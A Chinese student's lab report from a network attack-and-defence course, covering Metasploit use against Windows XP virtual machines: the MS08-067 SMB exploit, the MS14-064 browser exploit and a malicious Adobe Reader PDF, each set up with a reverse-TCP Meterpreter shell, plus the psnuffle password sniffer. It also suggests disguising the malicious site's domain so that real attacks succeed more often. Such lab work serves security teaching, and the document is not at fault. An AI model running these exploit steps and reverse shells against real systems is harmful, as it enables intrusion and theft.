2017-2018-2 20155315《网络对抗技术》Exp5 :MSF基础应用
实验目的
学会用metasploit进行简单的攻击操作
教程
实验内容
- metasploit中有六个模块分别是
渗透攻击模块(Exploit Modules)
辅助模块(Auxiliary Modules
攻击载荷(Payload Modules)
空字段模块(Nop Modules)
编码模块(Encoders)
后渗透攻击模块(Post)
- 本次实验使用的是
exploit
和auxiliary
- exploit:渗透攻击模块,指利用某种漏洞对目标主机进行攻击。渗透就是说攻击者通过目标主机上的一个漏洞将自己的恶意代码注入目标主机的系统,就像白蚁一样,从一个洞慢慢攻破整栋建筑。
- auxiliary:辅助模块,能够帮助渗透测试者在进行渗透攻击之前得到目标系统丰富的情报信息,从而发起更具目标性的精准攻击。它和
exploit
之间的关系就好像观察者和狙击手的关系,前者负责观察网络环境,得到准确的信息;后者就根据收集到的信息进行攻击。
实验步骤
(一)一个主动攻击实践,如ms08_067
MS08_67漏洞攻击主要主要原理是攻击者利用受害者主机默认开放的SMB服务端口445,发送恶意资料到这个端口,通过MSRPC接口调用server服务的一个函数,并破坏程序的栈缓存区,获得远程代码执行权限,从而完全控制主机。
实验环境
计算机 系统 IP地址 主机 kali 192.168.19.130 靶机 Windows XP SP3 English(AlwaysOn NX) 192.168.19.132 打开msfconsole设置载荷、参数,运行
use exploit/windows/smb/ms08_067_netapi
set payload generic/shell_reverse_tcp
set RHOST 192.168.19.132 //靶机的IP地址
set LHOST 192.168.19.130 //本机的IP地址
set LPORT 5315
exploit
- 一开始使用的是
target 10
,查看教程之后决定设置set target 0
让kali自动识别靶机的系统,这样攻击的成功率更大。 - 结果
- 让我们看看恶意资料伪装成什么程序。
- 重新设置载荷为
set payload windows/meterpreter/reverse_tcp
,exploit后使用getpid
得到我们伪装的进程的进程号 - 使用
ps -ef | grep 1064
查看进程 - 通过上次实验的分析知道Svchost.exe 是从动态链接库 (DLL) 中运行的服务的通用主机进程名称,这个程序对系统的正常运行是非常重要,而且是不能被结束的。也就是说我们的攻击被隐藏在系统程序下,想想还是很可怕的。
(二)一个针对浏览器的攻击,如ms14_064
实验环境
- Internet Exploer 8
计算机 系统 IP地址 主机 kali 192.168.19.130 靶机 Windows XP SP3 192.168.19.131 一开始使用教程中提到的
ms11_050
进行攻击的时候总是被数据执行保护程序杀死进程,努力将IE浏览器的的安全级别降到最低也无济于事,连续试了03_020
、ms12_037
、ms13_009
也不成功重新查找关于IE的exploit,从时间和等级上进行筛选,最后选择
windows/browser/ms14_064_ole_code_execution
Microsoft Windows OLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术,远程攻击者利用此漏洞通过构造的网站执行任意代码,影响Win95+IE3 – Win10+IE11全版本
- 看起来这个漏洞对于win xp应该是一击即中的。
use windows/browser/ms14_064_ole_code_execution
看看需要设置的参数- 设置载荷、参数,运行
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.19.130
set LPORT 2015
set URIPATH zyl_
- 结果
- 靶机打开IE浏览器输入生成的网址,kali的8080端口监听获得连接,建立会话
- 打开会话
(三)一个针对客户端的攻击,如Adobe
实验环境
- Adobe Reader 9.3
计算机 系统 IP地址 主机 kali 192.168.19.130 靶机 Windows XP SP3 192.168.19.131 本次实验采用的漏洞是
exploit/windows/browser/adobe_cooltype_sing
这个漏洞针对Adobe阅读器9.3.4之前的版本,一个名为SING表对象中一个名为uniqueName的参数造成缓冲区溢出
- 设置载荷、参数,运行
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.19.130
set LPORT 5315
set FILENAME 20155315
exploit
- 结果
- 打开监听模块
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.19.130
set LPORT 1111
- 将生成的恶意文件复制到靶机,运行之后kali显示回连成功
(四)应用辅助模块的攻击
实验环境
计算机 系统 IP地址 主机 kali 192.168.19.130 靶机 Windows XP SP3 192.168.19.131 进入
/usr/share/metasploit-framework/modules/auxiliary
目录查看有什么项目这里面我们看到一个感兴趣的
sniffer
,也就是网络嗅探器。进入目录发现只有一个
psnuffle.rb
psnuffle是metasploit中的口令嗅探工具,只有在接入对方网络的初始访问点后才能进行嗅探。
- 在
msfconsole
中use auxiliary/sniffer/psnuffle
,查看详细信息 - 可以看到它嗅探的是任意协议,捕获的长度是65535,时间限制是500s
run
在靶机打开百度,kali捕捉到了这次会话
实验中遇到的问题
- 在做第一个实验的时候出现
怀疑是靶机的445端口没有打开,根据网上的教程设置之后打开cmd查看445端口重新进行exploit,连接成功 - 做第二个实验的时候,靶机打开网页总是受到执行数据保护机制的阻挠。
- 就实验过程来看,对于比较旧的漏洞,IE浏览器或者说数据执行保护都能识别,但是更新的漏洞如果没有下载补丁,靶机的端口就相当于窗户拉开的一条缝,只要恶意网站被打开,攻击者就可以毫不费力地入侵靶机了。
实验问题回答
- 用自己的话解释什么是exploit,payload,encode.
- exploit就是通过一个小小的漏洞将自己的恶意代码植入目标主机从而达到攻击的目的,指的是一种攻击的手段
- payload就相当于是一段恶意代码,或者说是一个装有恶意代码的容器,通过载荷就可以控制目标主机
- encode是编码器,就是通过编码将恶意代码进行封装或伪装,使其不被目标主机检测为恶意软件
离实战还缺些什么技术或步骤
- 要真正开始实战的前提是要有足够准确的信息,也就是前期的信息搜集要更全面、更彻底
- 就本次实验而言,大多都是靶机进行操作来触发恶意代码使攻击方入侵成功的。在实际生活中,对可疑文件、可疑网址等都不会主动点击,因此,如果要进行实战最好是将恶意网站进行再次编辑或者修改域名之类的来提高成功的可能性。
实验总结
本次实验做下来还是比较顺利的,攻击成功的时候感觉自己酷酷的,但是离实战还有一定距离。另外,每做一个实验就又深深地觉得网络真是太不安全了,厉害的人这么多,还是要好好保护电脑!
参考资料
2017-2018-2 20155315《网络对抗技术》Exp5 :MSF基础应用的更多相关文章
- 20155232《网络对抗》Exp5 MSF基础应用
20155232<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode. exploit:就是利用可能存在的漏洞对目标进行攻击 ...
- 2018-2019-2 20165205 《网络对抗》 Exp5 MSF基础
2018-2019-2 20165205 <网络对抗> Exp5 MSF基础 实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1 ...
- 20155227《网络对抗》Exp5 MSF基础应用
20155227<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode exploit:把实现设置好的东西送到要攻击的主机里. ...
- 20155302《网络对抗》Exp5 MSF基础应用
20155302<网络对抗>Exp5 MSF基础应用 实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实践,如 ...
- 20155323刘威良《网络对抗》Exp5 MSF基础应用
20155323刘威良<网络对抗>Exp5 MSF基础应用 实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实 ...
- 20145301 赵嘉鑫 《网络对抗》Exp5 MSF基础应用
20145301 赵嘉鑫 <网络对抗>Exp5 MSF基础应用 一 实验链接 渗透实验一:MS08_067渗透实验 渗透实验二:MS14_064渗透实验 (首用) 渗透实验三:Adobe ...
- 20145215《网络对抗》Exp5 MSF基础应用
20145215<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode? exploit就相当于是载具,将真正要负责攻击的代码 ...
- 20145208 蔡野 《网络对抗》Exp5 MSF基础应用
20145208 蔡野 <网络对抗>Exp5 MSF基础应用 链接地址 主动攻击:利用ms08_067_netapi进行攻击 对浏览器攻击:MS10-002 对客户端攻击:adobe_to ...
- 20145311王亦徐 《网络对抗技术》 MSF基础应用
20145311王亦徐 <网络对抗技术> MSF基础应用 实验内容 掌握metasploit的基本应用方式以及常用的三种攻击方式的思路 主动攻击,即对系统的攻击,不需要被攻击方配合,以ms ...
- 20145325张梓靖 《网络对抗技术》 MSF基础应用
20145325张梓靖 <网络对抗技术> MSF基础应用 实验内容 掌握metasploit的基本应用方式以及常用的三种攻击方式的思路 主动攻击,即对系统的攻击,不需要被攻击方配合,这里以 ...
随机推荐
- 为什么选用 React 创建混合型移动应用?
[编者按]本文作者为 14islands 联合创始人.创新 Web 开发者 David Lindkvist,主要介绍有关混合型应用搭建的方方面面.文章系国内 ITOM 管理平台 OneAPM 编译呈现 ...
- gitlab上如何添加二进制文件(设计文档)
想将设计文档(原型设计图,UML设计图等)放到gitlab上,以供团队其他成员查看.将这些二进制文件跟源码一样纳入git管控显然是不合适的.经过一番摸索,找到了如何管理项目文档的方法. 根据Stack ...
- 转:java 委托
委托模式是软件设计模式中的一项基本技巧.在委托模式中,有两个对象参与处理同一个请求,接受请求的对象将请求委托给另一个对象来处理.委托模式是一项基本技巧,许多其他的模式,如状态模式.策略模式.访问者模式 ...
- django中的权限控制(form增删改)
Django默认提供了权限控制,但只能对使用了其自带的登录认证的用户进行权限控制,说白了就是只能对存储在auth_user表中的用户进行权限控制,但不能对未登录过的用户进行权限控制.但如果通过集成LD ...
- pandas模块安装问题笔记
1. # pip install pandas 引用 pandas 时,没有模块 ,进行模块安装,出现一推英文提示 结果 Collecting pandas Could not fetch URL ...
- Go语言-windows安装配置篇
Go-windows安装配置 前言 学习完了python基础,顺便也要提前学习一下go啦,抱着这样的心情,今晚尝试了安装一下go,很顺利的完成了,没有难度. 需要了解更多的关于Go的基本信息可以去维基 ...
- (1)StringBuilder类和StringBuffer类 (2)日期相关的类 (3)集合框架 (4)List集合
1.StringBuilder类和StringBuffer类(查手册会用即可)1.1 基本概念 由于String类描述的字符串内容无法更改,若程序中出现大量类似的字符串时需要申请独立的内存空间单独保存 ...
- Js 运算符(加减乘除)
1.加法 + +NaN //NaN,有一个为NaN就为NaN var box=Infinity+Infinity //Infinity var box=-Infinity + -Infinity // ...
- ZT 4.3 android bluetooth hfp分析
4.3 android bluetooth hfp分析 2013-08-20 20:16 592人阅读 评论(3) 收藏 举报 所有程序执行的代码都是有入口的,在这里我们暂时分析一种情景,蓝牙打开着, ...
- Day2 Spring初识(二)
Bean的实例化 bean实例化方式有3种:默认构造.静态工厂.实例工厂 默认构造 调用无参构造, 属性+setter User.java package entity; public class U ...